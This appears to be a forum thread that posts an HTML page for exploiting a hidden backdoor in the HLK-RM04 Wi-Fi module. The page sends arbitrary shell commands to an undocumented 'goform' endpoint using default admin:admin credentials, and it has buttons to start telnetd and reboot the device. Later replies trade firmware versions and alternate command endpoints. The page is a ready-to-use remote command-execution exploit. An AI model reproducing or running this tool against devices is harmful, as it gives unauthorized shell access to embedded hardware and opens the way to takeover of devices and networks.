Another backdoor for the rm04, need I say any more?

rm04-tool.html

<html>
<head>
<title>HLK-RM04 Tool</title>
<style>
form {
display: inline;
}
</style>

</head>
<body>
<h1>HLK-RM04 Tool</h1>

<b>Shell command:</b><br />
<form action="http://admin:admin@192.168.16.254/goform/hlk34fge3360llf94wwq24" method="POST" target="frame">
<input type="text" name="command" size=40 /><input type="submit" value="Run" />
</form>

<hr />

<b>Quick actions:</b><br />
<form action="http://admin:admin@192.168.16.254/goform/hlk34fge3360llf94wwq24" method="POST" target="frame">
<input type="hidden" name="command" value="telnetd" /><input type="submit" value="Start telnetd" />
</form>
<form action="http://admin:admin@192.168.16.254/goform/hlk34fge3360llf94wwq24" method="POST" target="frame">
<input type="hidden" name="command" value="reboot" /><input type="submit" value="Reboot" />
</form>

<iframe src="about:blank" name="frame" width="0" height="0" frameborder="0"></iframe>
</body>
</html>

Hi!

Not works for me. Firmware V1.78(Jul 23 2013)

Do you remember how to find action url in device's filesystem?

I have the same version and it works perfect. I jusst changed the three IP addresses in the file to the one of my module.

Seems this has changed over the years.

<html><head></head><body>
                This document has moved to a new <a href="http://192.168.0.1/adm/system_command.asp">location</a>.
                Please update your documents to reflect the new location.
                </body></html>

http://192.168.0.1/adm/system_command.asp results in a 404 page with both get and post requests.

hlk34fge3360llf94wwq24 404

how to find the url

http://192.168.88.254/cgi-bin/history.sh